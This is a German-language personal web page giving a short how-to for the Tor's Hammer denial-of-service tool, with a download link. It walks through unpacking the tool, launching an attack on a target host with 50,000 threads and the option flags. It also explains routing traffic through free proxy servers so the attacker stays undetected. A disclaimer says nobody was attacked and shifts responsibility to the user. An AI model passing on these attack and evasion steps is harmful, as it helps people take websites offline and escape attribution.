Informationen

Das ist nur ein HowTo wie der TorHammer funktioniert und keiner wurde in meinem Tutorial angegriffen.
Wenn Du beabsichtigt diesen TorHammer zu verwenden um andere einen Schaden zuzufügen bist Du selbst verantwortlich in dem was Du tust.

Im Internet gibt es tausende Webseiten die sich damit befassen, einige davon versuchen es geheim zu halten.
Normalerweise ist der TorHammer ein alter Hut und lohnt sich nicht wirklich, statt dessen handelt man sich nur Probleme ein.
Und das DarkNet braucht man nicht wirklich, Idioten gibt es auch ausserhalb vom DarkNet.

Album

Keine Photo's vorhanden

Downloads

# Name Type Downloads
1 TorsHammer Linux Download

HowTo

 How To Tor's Hammer
/******************************************************************
 * http://www.thorsten-auch.com
 * 
 * Copyright 2012 - 2019
/*****************************************************************/

1. Download
Das Tool Downloaden und entpacken.
$ tar xvf torshammer.tar

2. Tool starten
$ ./torshammer.py

3. Attacke starten
$ ./torshammer.py -t www.example.com -r 50000

4. Wie sieht der Befehl aus?
-t = Hostname
-p = Port
-r = Threads

5. Unerkannt bleiben
Dazu gibt es Proxy Server die man kostenlos verwenden kann, aber nicht jeder Proxy Server ist dazu geeignet.


6. Wie verstecke ich mich hinter einem Proxy Server?
Bevor man eine Attacke startet sucht man sich einen Proxy Server und im Terminal wird das so eingetragen.
$ export http_proxy='http://ip:port' // Einschalten
$ export https_proxy='https://ip:port' // Einschalten

$ unset http_proxy // ausschalten
$ unset https_proxy // ausschalten

Software Extras

  • NetBeans IDE 8.2 >

    NetBeans IDE 8.2 ist ein kostenloses Programm für Software Programmierer.
  • 1

Aufbau Arduino Uno

Raspberry Pi 3 Pin's

Studio Webcam